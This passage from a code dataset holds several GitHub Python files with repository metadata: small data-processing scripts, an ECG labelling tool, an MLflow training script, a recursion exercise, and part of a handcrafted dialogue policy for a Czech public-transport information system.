self.root.mainloop()\n\nif __name__ == '__main__':\n root = tk.Tk()\n MainPage()\n 
root.mainloop()\n\n\n","repo_name":"jamesmok102/CangjieLearner","sub_path":"page/demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":2295,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"44037060544","text":"#!/usr/bin/python3 \n\n#animals.py\n\nInFileName = \"animals.csv\"\nInFile = open(InFileName, 'r')\n\nOutFileName = \"new_animals.csv\"\nOutFile = open(OutFileName, 'w')\n\nLineNumber = 0\n\nfor line in InFile:\n if LineNumber > 0:\n line = line.strip('\\n')\n List = line.split(',')\n print(List[1] + \"\\t\" + List[0])\n OutputString = (List[1] + \"\\t\" + List[0])\n OutFile.write(str(OutputString))\n LineNumber = LineNumber + 1\n\nInFile.close()\nOutFile.close()\n\n","repo_name":"rkyger-git/BIOL792-1044_Bioinformatics_and_Data_Science","sub_path":"animals.py","file_name":"animals.py","file_ext":"py","file_size_in_byte":477,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"17743362430","text":"\"\"\"\nTakes the raw inputs and transforms them to an array.\n\"\"\"\nimport argparse\nimport base64\nimport binascii\nimport codecs\nimport json\nimport numpy as np\nimport os\nimport shutil\nimport struct\n\n#import matplotlib.pyplot as plt\n\n#%matplotlib inline\n\ndef contains(str1, str2):\n index_start = str1.find(str2)\n index_end = index_start + len(str2) -1\n if index_start < 0:\n return 0\n \n if index_start-1 >= 0:\n if str1[index_start-1] != \",\":\n return 0\n \n if index_end + 1 < len(str1):\n if str1[index_end + 1] != \",\":\n return 0\n return 1\n\ndef process(directory, objects_name_group, objects_name_exclude_group, output_dir, verbose):\n \"\"\"\n Goes through all the files\n \"\"\"\n files_name = os.listdir(directory)\n Y = np.zeros(len(files_name))\n out_was_modified = np.zeros(len(files_name))\n out_file_name = []\n print(len(files_name))\n for j in range(len(files_name)):\n file_name = directory+\"/\"+files_name[j] \n data = json.load(open(file_name))\n \n \n ds = data['RestingECG']['Diagnosis']['CategoriesDiagnosis']\n try:\n # AND\n for i in range(len(objects_name_group)):\n flag = 1\n objects_name = objects_name_group[i]\n objects_name_exclude = objects_name_exclude_group[i]\n for and_object_name in objects_name:\n # OR\n or_flag = 0\n for object_name in and_object_name:\n if or_flag == 0:\n or_flag = contains(ds, object_name)\n else:\n break\n if or_flag == 0:\n flag = 0\n break\n # Exclude\n for object_name_exclude in objects_name_exclude:\n if flag == 1:\n flag = abs(1 - contains(ds, object_name_exclude))\n else:\n break\n if flag == 1:\n Y[j] = i + 1\n break\n except:\n \"ERROR\"\n pass\n if verbose:\n print(Y[j])\n was_modified = 0\n if data['RestingECG']['Diagnosis']['CategoriesDiagnosis'] != data['RestingECG']['Diagnosis']['CategoriesOriginal']:\n was_modified = 1\n \n out_was_modified[j] = was_modified\n out_file_name.append(files_name[j])\n\n\n np.savetxt(output_dir+'/was_modified.txt', out_was_modified, fmt='%d')\n np.savetxt(output_dir+'/Y.txt', Y, fmt='%d')\n\n with open(output_dir+'/file_name.json', 'w') as f:\n f.write(json.dumps(files_name))\n\ndef main():\n \"\"\"\n -v:\n directory: the directory of the raw input data\n lead: 0 is for shorter one, 1 for longer one\n \"\"\"\n parser = argparse.ArgumentParser(description='Flags')\n parser.add_argument('-v', dest='verbose', action='store_true')\n parser.add_argument('directory')\n parser.add_argument('disease')\n args = parser.parse_args()\n\n PERI = [['200']]\n 
PERI_IGNORE = ['302,200','145,302,155,200,220']\n\n STE = [['330,160','330,161', '330,162', '330,163', '330,165', '330,166', '330,174']]\n STE_IGNORE = ['312,330']\n\n # [0] = SVT, [1] = with Aberrancy\n SVT = [['21','50,346','51,346','52','53','55'], ['86','100','101','102','104','105','106','349']]\n SVT_IGNORE = []\n\n VT = [['70','72','73']]\n VT_IGNORE = []\n\n data = []\n data_ignore = []\n other_objects = []\n output_dir = \"\"\n\n if args.disease == \"ps\":\n data = [PERI, STE]\n data_ignore = [PERI_IGNORE, STE_IGNORE]\n other_objects = STE\n output_dir = \"out_PS\"\n elif args.disease == \"vts\":\n data = [VT, SVT]\n data_ignore = [VT_IGNORE, SVT_IGNORE]\n other_objects = PERI\n output_dir = \"out_VTSVT\"\n else:\n return\n\n # Clear folder if exists\n if os.path.exists(output_dir):\n shutil.rmtree(output_dir)\n os.makedirs(output_dir)\n\n # Add to folder\n process(args.directory, data, data_ignore, output_dir, args.verbose)\n\nmain()","repo_name":"KevinAyuque/EKG-Project","sub_path":"data_Y.py","file_name":"data_Y.py","file_ext":"py","file_size_in_byte":4164,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"30337242934","text":"import warnings\n\nimport pandas as pd\nimport numpy as np\nfrom sklearn.model_selection import train_test_split, GridSearchCV\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.svm import SVC\nfrom sklearn.metrics import accuracy_score, precision_score, recall_score, f1_score\nimport mlflow\nimport mlflow.sklearn\n\nTHRESHOLD = 0.5\nTEST_SIZE = 0.3\nDATA_RANDOM_STATE = 0 \n\ndef main():\n\n warnings.simplefilter(action='ignore', category=FutureWarning)\n warnings.simplefilter(action='ignore', category=UserWarning)\n warnings.simplefilter(action='ignore', category=RuntimeWarning)\n\n # Load the csv dataset \n df = pd.read_csv(\"../data-layer/data/training/data.csv\")\n\n # Independent and Dependent features\n X=df.iloc[:,:-1]\n y=df.iloc[:,-1]\n\n # Train test split \n X_train,X_test,y_train,y_test=train_test_split(X, y, test_size=TEST_SIZE, random_state=DATA_RANDOM_STATE)\n\n mlflow.set_experiment(\"Experimentation\")\n mlflow.sklearn.autolog()\n with mlflow.start_run(run_name=\"train_model_lr\", nested=True) as run:\n mlflow.set_tag(\"mlflow.runName\", \"train_model_lr\")\n\n # Initializing classifier with the best params \n lr = LogisticRegression(penalty='l2', C=1e-5, class_weight=None)\n\n # Model training \n lr.fit(X_train, y_train)\n\n # Prediction \n y_probas = lr.predict(X_test)\n y_preds = [1 if y_proba > THRESHOLD else 0 for y_proba in y_probas]\n\n # Evaluation \n accuracy = accuracy_score(y_test, y_preds)\n precision = precision_score(y_test, y_preds)\n recall = recall_score(y_test, y_preds)\n f1 = f1_score(y_test, y_preds)\n \n print('Final Testing RESULTS')\n print('/-------------------------------------------------------------------------------------------------------- /')\n print('Accuracy is ', accuracy)\n print('Precision is ', precision)\n print('Recall is ', recall)\n print('F1-Score is ', f1)\n print('/-------------------------------------------------------------------------------------------------------- /')\n\n # Saving parameters, metrics, and model\n mlflow.log_metric(\"test_accuracy\", accuracy)\n mlflow.log_metric(\"precision\", precision)\n mlflow.log_metric(\"recall\", recall)\n mlflow.log_metric(\"f1-score\", f1)\n\nif __name__== 
\"__main__\":\n\tmain()","repo_name":"jackma-00/thesis-mlops-platform-poc","sub_path":"experimentation/reproducibility-tests/lr_train.py","file_name":"lr_train.py","file_ext":"py","file_size_in_byte":2372,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"35078946286","text":"'''\nbsctools - a single cell bacteria transcripton analysis pipeline\n====================================================================\n\n:Author: \n:Release: bioinplant\n:Date: 2022.09.15\n:Tags: Bacteria SCRNA-seq analysis pipeline\n\nThere are 3 tools:\n\n - inanno This tools based on kraken2 to do species identification\n - pandb Dataset of bacteria pangenome in genus level\n - pang Pan-genome test\n\nTo get help on a specific tool, type:\n\n\tbsctools --help\n\nTo use a specific tools, type:\n\n\tbsctools [tools options] [tool argument]\n'''\n\nfrom __future__ import absolute_import\nimport os\nimport sys\nimport importlib\nfrom bsctools import __version__\n\ndef main(argv = None):\n\n argv = sys.argv\n\n path = os.path.abspath(os.path.dirname(__file__))\n\n if len(argv) == 1 or argv[1] == \"--help\" or argv[1] == \"-h\":\n print(globals()[\"__doc__\"])\n\n return\n\n elif len(argv) ==1 or argv[1] == \"--version\" or argv[1] == \"-v\":\n print(\"bsctools version: %s\" % __version__)\n\n return\n\n elif argv[2] in [\"--help\", \"-h\", \"--help-extended\"]:\n print(\"bsctools: Version %s\" % __version__)\n\n command = argv[1]\n\n module = importlib.import_module(\"bsctools.\" + command, \"bsctools\")\n ##remove 'bsctools' from sys.argv\n del sys.argv[0]\n module.main(sys.argv)\n\nif __name__ == '__main__':\n sys.exit(main())\n","repo_name":"GibbsQian/SCBacteria_species_identification","sub_path":"bsctools/bsctools.py","file_name":"bsctools.py","file_ext":"py","file_size_in_byte":1344,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"5621584897","text":"# -*- coding: utf-8 -*-\nimport time\nfrom functools import wraps\n\n\ndef getRunningTime(func):\n\n @wraps(func)\n def wrapper(*args, **kwargs):\n start = time.time()\n try:\n return func(*args, **kwargs)\n finally:\n end = time.time()\n print(end - start)\n return wrapper\n\n\n@getRunningTime\ndef solution(n, _open, close, bracket, result):\n if close == n:\n result.append(bracket)\n return\n\n # 열고\n if _open < n:\n solution(n, _open + 1, close, bracket + \"(\", result)\n\n # 닫고\n if close < _open:\n solution(n, _open, close + 1, bracket + \")\", result)\n\n\n# main\nif __name__ == \"__main__\":\n # 시간 체크\n n = 4\n\n result = list()\n solution(n, 0, 0, \"\", result)\n print(len(result))\n","repo_name":"bluemiv/Algorithm","sub_path":"mailprogramming/python/exam05.py","file_name":"exam05.py","file_ext":"py","file_size_in_byte":788,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"39939969877","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom __future__ import unicode_literals\n\nimport random\nimport itertools\n\nfrom alex.components.dm import DialoguePolicy\nfrom alex.components.slu.da import DialogueAct, DialogueActItem\nfrom alex.applications.utils.weather import OpenWeatherMapWeatherFinder\n# from alex.components.slu.da import DialogueActConfusionNetwork\n# from alex.components.asr.utterance import Utterance, UtteranceNBList, UtteranceConfusionNetwork\n\nfrom datetime import timedelta\nfrom .directions import GoogleDirectionsFinder, Travel, NotSupported\nfrom 
.platform_info import PlatformInfo\nfrom datetime import datetime\nfrom datetime import time as dttime\nfrom collections import defaultdict\nimport re\n\n\ndef randbool(n):\n \"\"\"Randomly return True in 1 out of n cases.\n\n :param n: Inverted chance of returning True\n :rtype: Boolean\n \"\"\"\n if random.randint(1, n) == 1:\n return True\n return False\n\n\nclass PTICSHDCPolicy(DialoguePolicy):\n \"\"\"The handcrafted policy for the PTI-CS system.\"\"\"\n\n def __init__(self, cfg, ontology):\n super(PTICSHDCPolicy, self).__init__(cfg, ontology)\n\n directions_type = GoogleDirectionsFinder\n if 'directions' in cfg['DM'] and 'type' in cfg['DM']['directions']:\n directions_type = cfg['DM']['directions']['type']\n self.directions = directions_type(cfg=cfg)\n self.weather = OpenWeatherMapWeatherFinder(cfg=cfg)\n self.infer_default_stops = directions_type == GoogleDirectionsFinder\n\n self.system_das = []\n self.last_system_dialogue_act = None\n\n self.debug = cfg.getpath('DM/basic/debug', False)\n self.system_logger = cfg['Logging']['system_logger']\n self.policy_cfg = self.cfg['DM']['dialogue_policy']['PTICSHDCPolicy']\n self.accept_prob = self.policy_cfg['accept_prob']\n\n def reset_on_change(self, ds, changed_slots):\n \"\"\"Reset slots which depends on changed slots.\n\n :param ds: dialogue state\n :param changed_slots: slots changed in the last turn\n \"\"\"\n for ds_slot in ds:\n if ds_slot in changed_slots:\n # do not reset a slot which just changed\n continue\n\n for changed_slot in changed_slots:\n if self.ontology.reset_on_change(ds_slot, changed_slot):\n if isinstance(ds[ds_slot], float):\n ds[ds_slot] = 0.0\n elif isinstance(ds[ds_slot], int):\n ds[ds_slot] = 0\n elif isinstance(ds[ds_slot], basestring):\n ds[ds_slot] = \"none\"\n else:\n ds[ds_slot].reset()\n\n self.system_logger.debug(\"Reset on change: {slot} because of {changed_slot}\".format(slot=ds_slot,\n changed_slot=changed_slot))\n break\n\n def filter_iconfirms(self, da):\n \"\"\"Filter implicit confirms if the same information is uttered in an inform\n dialogue act item. Also filter implicit confirms for stop names equaling city names.\n\n :param da: unfiltered dialogue act\n :return: filtered dialogue act\n \"\"\"\n new_da = DialogueAct()\n informs = []\n iconfirms = defaultdict(int)\n\n for dai in da:\n if dai.dat == 'inform':\n informs.append((dai.name, dai.value))\n elif dai.dat == 'iconfirm':\n iconfirms[(dai.name, dai.value)] += 1\n\n for dai in da:\n if dai.dat == 'iconfirm':\n # filter slots explicitly informed\n if (dai.name, dai.value) in informs:\n continue\n # filter repeating iconfirms\n elif iconfirms[dai.name, dai.value] > 1:\n iconfirms[dai.name, dai.value] -= 1\n continue\n # filter mistakenly added iconfirms that have an unset/meaningless value\n elif dai.value is None or dai.value in ['none', '*']:\n continue\n # filter stop names that are the same as city names\n elif dai.name.endswith('_stop'):\n city_dai = dai.name[:-4] + 'city'\n if (city_dai, dai.value) in informs or iconfirms[(city_dai, dai.value)]:\n continue\n\n new_da.append(dai)\n\n return new_da\n\n def get_da(self, dialogue_state):\n \"\"\"The main policy decisions are made here. For each action, some set of conditions must be met. 
These\n conditions depend on the action.\n\n :param dialogue_state: the belief state provided by the tracker\n :return: a dialogue act - the system action\n \"\"\"\n ludait_prob, last_user_dai_type = dialogue_state[\"ludait\"].mph()\n if ludait_prob < self.policy_cfg['accept_prob_ludait']:\n last_user_dai_type = 'none'\n\n # all slots being requested by the user\n slots_being_requested = dialogue_state.get_slots_being_requested(self.policy_cfg['accept_prob_being_requested'])\n # all slots being confirmed by the user\n slots_being_confirmed = dialogue_state.get_slots_being_confirmed(self.policy_cfg['accept_prob_being_confirmed'])\n # all slots supplied by the user but not implicitly confirmed\n noninformed_slots = dialogue_state.get_slots_being_noninformed(self.policy_cfg['accept_prob_noninformed'])\n # all slots deemed to be accepted\n accepted_slots = dialogue_state.get_accepted_slots(self.accept_prob)\n # all slots that should be confirmed\n slots_tobe_confirmed = dialogue_state.get_slots_tobe_confirmed(self.policy_cfg['confirm_prob'], self.accept_prob)\n # filter out all the slots that are not defined by the ontology to be confirmed\n slots_tobe_confirmed = {k: v for k, v in slots_tobe_confirmed.items() if k in self.ontology.slots_system_confirms()}\n # all slots for which the policy can use ``select`` DAI\n slots_tobe_selected = dialogue_state.get_slots_tobe_selected(self.policy_cfg['select_prob'])\n # filter out all the slots that are not defined by the ontology to be selected\n slots_tobe_selected = {k: v for k, v in slots_tobe_selected.items() if k in self.ontology.slots_system_selects()}\n # all slots changed by a user in the last turn\n changed_slots = dialogue_state.get_changed_slots(self.accept_prob)\n # did the state change at all?\n has_state_changed = dialogue_state.has_state_changed(self.policy_cfg['min_change_prob'])\n\n if self.debug:\n s = []\n s.append('PTICSHDCPolicy - Slot stats')\n s.append(\"\")\n s.append(\"ludait: %s\" % unicode(last_user_dai_type))\n s.append(\"Slots being requested: %s\" % unicode(slots_being_requested))\n s.append(\"Slots being confirmed: %s\" % unicode(slots_being_confirmed))\n s.append(\"Non-informed slots: %s\" % unicode(noninformed_slots))\n s.append(\"\")\n s.append(\"Accepted slots: %s\" % unicode(accepted_slots))\n s.append(\"Slots to be confirmed: %s\" % unicode(slots_tobe_confirmed))\n s.append(\"Slots to be selected: %s\" % unicode(slots_tobe_selected))\n s.append(\"Changed slots: %s\" % unicode(changed_slots))\n s.append(\"State changed? 
%s\" % unicode(has_state_changed))\n s = '\\n'.join(s)\n\n self.system_logger.debug(s)\n\n # output DA\n res_da = None\n\n # reset all slots depending on changed slots\n self.reset_on_change(dialogue_state, changed_slots)\n\n # These facts are used in the dialog-controlling conditions that follow.\n # They are named so that the dialog-controlling code is more readable.o\n fact = {\n 'max_turns_exceeded': dialogue_state.turn_number > self.cfg[\n 'PublicTransportInfoCS']['max_turns'],\n 'dialog_begins': len(self.system_das) == 0,\n 'user_did_not_say_anything': last_user_dai_type == \"silence\",\n 'user_said_bye': \"lta_bye\" in accepted_slots,\n 'we_did_not_understand': last_user_dai_type == \"null\" or\n last_user_dai_type == \"other\",\n 'user_wants_help': last_user_dai_type == \"help\",\n 'user_thanked': last_user_dai_type == \"thankyou\",\n 'user_wants_restart': last_user_dai_type == \"restart\",\n 'user_wants_us_to_repeat': last_user_dai_type == \"repeat\",\n 'there_is_something_to_be_selected': bool(slots_tobe_selected),\n 'there_is_something_to_be_confirmed': bool(slots_tobe_confirmed),\n 'user_wants_to_know_the_time': 'current_time' in\n slots_being_requested,\n 'user_wants_to_know_the_weather': dialogue_state[\n 'lta_task'].test('weather', self.accept_prob),\n 'user_wants_to_find_the_platform': dialogue_state[\n 'lta_task'].test('find_platform', self.accept_prob),\n }\n\n\n # topic-independent behavior\n if fact['max_turns_exceeded']:\n # Hang up if the talk has been too long\n res_da = DialogueAct('bye()&inform(toolong=\"true\")')\n\n elif fact['dialog_begins']:\n # NLG(\"Dobrý den. Jak Vám mohu pomoci\")\n res_da = DialogueAct(\"hello()\")\n dialogue_state['lta_task'].set('find_connection', 1.0)\n\n elif fact['user_did_not_say_anything']:\n # at this moment the silence and the explicit null act\n # are treated the same way: NLG(\"\")\n silence_time = dialogue_state['silence_time']\n\n if silence_time > self.cfg['DM']['basic']['silence_timeout']:\n res_da = DialogueAct('inform(silence_timeout=\"true\")')\n else:\n res_da = DialogueAct(\"silence()\")\n dialogue_state[\"ludait\"].reset()\n\n elif fact['user_said_bye']:\n # NLG(\"Na shledanou.\")\n res_da = DialogueAct(\"bye()\")\n dialogue_state[\"ludait\"].reset()\n dialogue_state[\"lta_bye\"].reset()\n\n elif fact['we_did_not_understand']:\n # NLG(\"Sorry, I did not understand. You can say...\")\n res_da = DialogueAct(\"notunderstood()\")\n res_da.extend(self.get_limited_context_help(dialogue_state))\n dialogue_state[\"ludait\"].reset()\n\n elif fact['user_wants_help']:\n # NLG(\"Pomoc.\")\n res_da = DialogueAct(\"help()\")\n dialogue_state[\"ludait\"].reset()\n\n elif fact['user_thanked']:\n # NLG(\"Díky.\")\n res_da = DialogueAct('inform(cordiality=\"true\")&hello()')\n dialogue_state[\"ludait\"].reset()\n\n elif fact['user_wants_restart']:\n # NLG(\"Dobře, zančneme znovu. 
Jak Vám mohu pomoci?\")\n dialogue_state.restart()\n res_da = DialogueAct(\"restart()&hello()\")\n dialogue_state[\"ludait\"].reset()\n\n elif fact['user_wants_us_to_repeat']:\n # NLG - use the last dialogue act\n res_da = DialogueAct(\"irepeat()\")\n dialogue_state[\"ludait\"].reset()\n\n elif fact['there_is_something_to_be_selected']:\n # implicitly confirm all changed slots\n res_da = self.get_iconfirm_info(changed_slots)\n # select between two values for a slot that is not certain\n res_da.extend(self.select_info(slots_tobe_selected))\n res_da = self.filter_iconfirms(res_da)\n\n elif fact['there_is_something_to_be_confirmed']:\n # implicitly confirm all changed slots\n res_da = self.get_iconfirm_info(changed_slots)\n # confirm all slots that are not certain\n res_da.extend(self.confirm_info(slots_tobe_confirmed))\n res_da = self.filter_iconfirms(res_da)\n\n elif fact['user_wants_to_know_the_time']:\n # Respond to questions about current weather\n # TODO: allow combining with other questions?\n res_da = self.req_current_time()\n\n # topic-dependent\n elif fact['user_wants_to_know_the_weather']:\n # implicitly confirm all changed slots\n res_da = self.get_iconfirm_info(changed_slots)\n\n # talk about weather\n w_da = self.get_weather_res_da(dialogue_state, last_user_dai_type, slots_being_requested, slots_being_confirmed,\n accepted_slots, changed_slots, has_state_changed)\n res_da.extend(w_da)\n res_da = self.filter_iconfirms(res_da)\n elif fact['user_wants_to_find_the_platform']:\n # implicitly confirm all changed slots\n res_da = self.get_iconfirm_info(changed_slots)\n\n # talk about the platform nuber\n da = self.get_platform_res_da(dialogue_state, last_user_dai_type,\n slots_being_requested,\n slots_being_confirmed, accepted_slots,\n changed_slots, has_state_changed)\n res_da.extend(da)\n res_da = self.filter_iconfirms(res_da)\n else:\n # implicitly confirm all changed slots\n res_da = self.get_iconfirm_info(changed_slots)\n # talk about public transport\n t_da = self.get_connection_res_da(dialogue_state, last_user_dai_type, slots_being_requested, slots_being_confirmed,\n accepted_slots, changed_slots, has_state_changed)\n res_da.extend(t_da)\n res_da = self.filter_iconfirms(res_da)\n\n self.last_system_dialogue_act = res_da\n\n # record the system dialogue acts\n self.system_das.append(self.last_system_dialogue_act)\n return self.last_system_dialogue_act\n\n def get_connection_res_da(self, ds, ludait, slots_being_requested, slots_being_confirmed,\n accepted_slots, changed_slots, state_changed):\n \"\"\"Handle the public transport connection dialogue topic.\n\n :param ds: The current dialogue state\n :param slots_being_requested: The slots currently requested by the user\n :rtype: DialogueAct\n \"\"\"\n # output DA\n res_da = None\n\n if ludait == \"reqalts\":\n # NLG(\"There is nothing else in the database.\")\n # NLG(\"The next connection is ...\")\n res_da = self.get_an_alternative(ds)\n ds[\"ludait\"].reset()\n\n elif \"alternative\" in accepted_slots:\n # Search for traffic direction and/or present the requested directions already found\n res_da = self.get_requested_alternative(ds)\n ds[\"alternative\"].reset()\n\n elif slots_being_requested:\n # inform about all requested slots\n res_da = self.get_requested_info(slots_being_requested, ds, accepted_slots)\n\n elif slots_being_confirmed:\n # inform about all slots being confirmed by the user\n res_da = self.get_confirmed_info(slots_being_confirmed, ds, accepted_slots)\n\n else:\n # gather known information about the connection\n 
req_da, iconfirm_da, conn_info = self.gather_connection_info(ds, accepted_slots)\n if len(req_da) == 0:\n if state_changed:\n # we know everything we need -> start searching\n ds.conn_info = conn_info\n res_da = iconfirm_da\n res_da.extend(self.get_directions(ds, check_conflict=True))\n else:\n res_da = self.backoff_action(ds)\n else:\n res_da = req_da\n\n return res_da\n\n def get_platform_res_da(self, ds, ludait, slots_being_requested,\n slots_being_confirmed, accepted_slots,\n changed_slots, state_changed):\n if slots_being_requested:\n # inform about all requested slots\n res_da = self.get_requested_info(slots_being_requested, ds, accepted_slots)\n\n elif slots_being_confirmed:\n # inform about all slots being confirmed by the user\n res_da = self.get_confirmed_info(slots_being_confirmed, ds, accepted_slots)\n\n else:\n # gather known information about the connection\n req_da, iconfirm_da, platform_info = self.gather_platform_info(ds,\n accepted_slots)\n\n if len(req_da) == 0:\n if state_changed:\n # we know everything we need -> start searching\n res_da = DialogueAct()\n try:\n platform_res = self.directions.get_platform(platform_info)\n\n if not platform_res:\n res_da.append(DialogueActItem('inform', 'platform',\n 'not_found'))\n res_da.append(DialogueActItem('inform', 'direction',\n platform_info.to_stop))\n else:\n if platform_info.directions:\n based_on_directions = 'true'\n else:\n based_on_directions = 'false'\n\n res_da.append(DialogueActItem('inform', 'based_on_directions', based_on_directions))\n\n if platform_res.platform:\n res_da.append(DialogueActItem('inform', 'platform',\n platform_res.platform))\n res_da.append(DialogueActItem('inform', 'track',\n platform_res.track))\n if platform_info.train_name != 'none':\n res_da.append(DialogueActItem('inform',\n 'train_name',\n platform_info.train_name))\n else:\n res_da.append(DialogueActItem('inform', 'direction',\n platform_res.direction))\n else:\n res_da.append(DialogueActItem('inform', 'platform',\n 'none'))\n res_da.append(DialogueActItem('inform', 'track',\n 'none'))\n res_da.append(DialogueActItem('inform', 'direction',\n platform_res.direction))\n except NotSupported:\n res_da.append(DialogueActItem('inform', 'not_supported'))\n else:\n res_da = self.backoff_action(ds)\n else:\n res_da = req_da\n\n return res_da\n\n def get_weather_res_da(self, ds, ludait, slots_being_requested, slots_being_confirmed,\n accepted_slots, changed_slots, state_changed):\n \"\"\"Handle the dialogue about weather.\n\n :param ds: The current dialogue state\n :param slots_being_requested: The slots currently requested by the user\n :rtype: DialogueAct\n \"\"\"\n res_da = None\n if state_changed:\n res_da = self.get_weather(ds)\n else:\n res_da = self.backoff_action(ds)\n return res_da\n\n def get_weather(self, ds):\n \"\"\"Retrieve weather information according to the current dialogue state.\n\n :param ds: The current dialogue state\n :rtype: DialogueAct\n \"\"\"\n # get dialogue state values\n time_abs = ds['time'].mpv()\n time_rel = ds['time_rel'].mpv()\n date_rel = ds['date_rel'].mpv()\n ampm = ds['ampm'].mpv()\n lta_time = ds['lta_time'].mpv()\n in_city = ds['in_city'].mpv()\n\n # return the result\n res_da = DialogueAct()\n\n # default city if no city is set\n if in_city == 'none':\n in_city = self.ontology.get_default_value('in_city')\n res_da.append(DialogueActItem('iconfirm', 'in_city', in_city))\n\n # interpret time\n daily = (time_abs == 'none' and ampm == 'none' and date_rel != 'none' and lta_time != 'time_rel')\n # check if any time 
is set to distinguish current/prediction\n weather_ts = None\n if time_abs != 'none' or time_rel not in ['none', 'now'] or ampm != 'none' or date_rel != 'none':\n weather_ts, time_type = self.interpret_time(time_abs, ampm, time_rel, date_rel, lta_time)\n # find the coordinates of the city\n city_addinfo = self.ontology['addinfo']['city'].get(in_city, None)\n if city_addinfo:\n # TODO: here we just take the first city of that name. We should do some\n # resolution of cities with the same name in different districts\n lon, lat = city_addinfo[0]['lon'], city_addinfo[0]['lat']\n else:\n lon, lat = None, None\n # request the weather\n weather = self.weather.get_weather(time=weather_ts, daily=daily, city=in_city, lon=lon, lat=lat)\n # check errors\n if weather is None:\n return DialogueAct('apology()&inform(in_city=\"%s\")' % in_city)\n # time\n if weather_ts:\n if time_type == 'rel':\n res_da.append(DialogueActItem('inform', 'time_rel', time_rel))\n else:\n if time_abs != 'none' or ampm != 'none':\n res_da.append(DialogueActItem('inform', 'time',\n '%d:%02d' % (weather_ts.hour, weather_ts.minute)))\n if date_rel != 'none':\n res_da.append(DialogueActItem('inform', 'date_rel', date_rel))\n else:\n res_da.append(DialogueActItem('inform', 'time_rel', 'now'))\n # temperature\n if not daily:\n res_da.append(DialogueActItem('inform', 'temperature', str(weather.temp)))\n else:\n res_da.append(DialogueActItem('inform', 'min_temperature', str(weather.min_temp)))\n res_da.append(DialogueActItem('inform', 'max_temperature', str(weather.max_temp)))\n # weather conditions\n res_da.append(DialogueActItem('inform', 'weather_condition', weather.condition))\n return res_da\n\n def backoff_action(self, ds):\n \"\"\"Generate a random backoff dialogue act in case we don't know what to do.\n\n :param ds: The current dialogue state\n :rtype: DialogueAct\n \"\"\"\n if randbool(10):\n return self.get_limited_context_help(ds)\n elif randbool(9):\n return DialogueAct('reqmore()')\n elif randbool(8):\n return DialogueAct('notunderstood()')\n elif randbool(3):\n return DialogueAct('irepeat()')\n return DialogueAct('silence()')\n\n def get_an_alternative(self, ds):\n \"\"\"Return an alternative route, if there is one, or ask for\n origin stop if there has been no route searching so far.\n\n :param ds: The current dialogue state\n :rtype: DialogueAct\n \"\"\"\n if ds.route_alternative is None:\n return DialogueAct('request(from_stop)')\n else:\n ds.route_alternative += 1\n ds.route_alternative %= len(ds.directions) if ds.directions is not None else 1\n return self.get_directions(ds)\n\n def get_requested_alternative(self, ds):\n \"\"\"Return the requested route (or inform about not finding one).\n\n :param ds: The current dialogue state\n :rtype: DialogueAct\n \"\"\"\n res_da = DialogueAct()\n\n if ds.route_alternative is not None:\n ds_alternative = ds[\"alternative\"].mpv()\n\n if ds_alternative == \"last\":\n res_da.extend(self.get_directions(ds, \"last\"))\n elif ds_alternative == \"next\":\n ds.route_alternative += 1\n try:\n ds.directions[ds.route_alternative]\n res_da.extend(self.get_directions(ds, \"next\"))\n except:\n ds.route_alternative -= 1\n res_da.append(DialogueActItem(\"inform\", \"found_directions\", \"no_next\"))\n\n elif ds_alternative == \"prev\":\n ds.route_alternative -= 1\n\n if ds.route_alternative == -1:\n ds.route_alternative += 1\n res_da.append(DialogueActItem(\"inform\", \"found_directions\", \"no_prev\"))\n else:\n res_da.extend(self.get_directions(ds, \"prev\"))\n\n else:\n 
ds.route_alternative = int(ds_alternative) - 1\n res_da.extend(self.get_directions(ds))\n\n else:\n res_da.append(DialogueActItem(\"inform\", \"stops_conflict\", \"no_stops\"))\n\n return res_da\n\n def get_requested_info(self, requested_slots, ds, accepted_slots):\n \"\"\"Return a DA containing information about all requested slots.\n\n :param ds: The current dialogue state\n :param requested_slots: A dictionary with keys for all requested \\\n slots and the correct return values.\n :rtype: DialogueAct\n \"\"\"\n res_da = DialogueAct()\n\n for slot in requested_slots:\n # for these, we don't need any route information, we can answer straight away\n if slot not in ['from_stop', 'to_stop',\n 'departure_time', 'departure_time_rel',\n 'arrival_time', 'arrival_time_rel',\n 'duration', 'num_transfers', 'time_transfers', ]:\n dai = DialogueActItem(\"inform\", slot, requested_slots[slot])\n res_da.append(dai)\n # remember that we answered\n ds[\"rh_\" + slot].reset()\n continue\n\n # try to find a route if we don't know it yet\n if ds.route_alternative is None:\n req_da, iconfirm_da, conn_info = self.gather_connection_info(ds, accepted_slots)\n # we have all information we need, start searching\n if len(req_da) == 0:\n ds.conn_info = conn_info\n res_da = iconfirm_da\n # the search will change ds.route_alternative if a route is found\n dir_da = self.get_directions(ds, check_conflict=True)\n # only return the output DAs if no route is found (i.e., the error message),\n # otherwise we go on to return the specific information requested\n if ds.route_alternative is None:\n res_da.extend(dir_da)\n # we don't know enough, ask about the rest\n else:\n res_da = req_da\n\n # we have a route, so return information about it\n # NB: ds.route_alternative might have changed in the meantime if a route has been found\n if ds.route_alternative is not None:\n if slot == 'from_stop':\n res_da.extend(self.req_from_stop(ds))\n elif slot == 'to_stop':\n res_da.extend(self.req_to_stop(ds))\n elif slot == 'departure_time':\n res_da.extend(self.req_departure_time(ds))\n elif slot == 'departure_time_rel':\n res_da.extend(self.req_departure_time_rel(ds))\n elif slot == 'arrival_time':\n res_da.extend(self.req_arrival_time(ds))\n elif slot == 'arrival_time_rel':\n res_da.extend(self.req_arrival_time_rel(ds))\n elif slot == 'duration':\n res_da.extend(self.req_duration(ds))\n elif slot == \"num_transfers\":\n res_da.extend(self.req_num_transfers(ds))\n elif slot == \"time_transfers\":\n res_da.extend(self.req_time_transfers(ds))\n\n # remember that we answered\n ds[\"rh_\" + slot].reset()\n\n return res_da\n\n def get_confirmed_info(self, 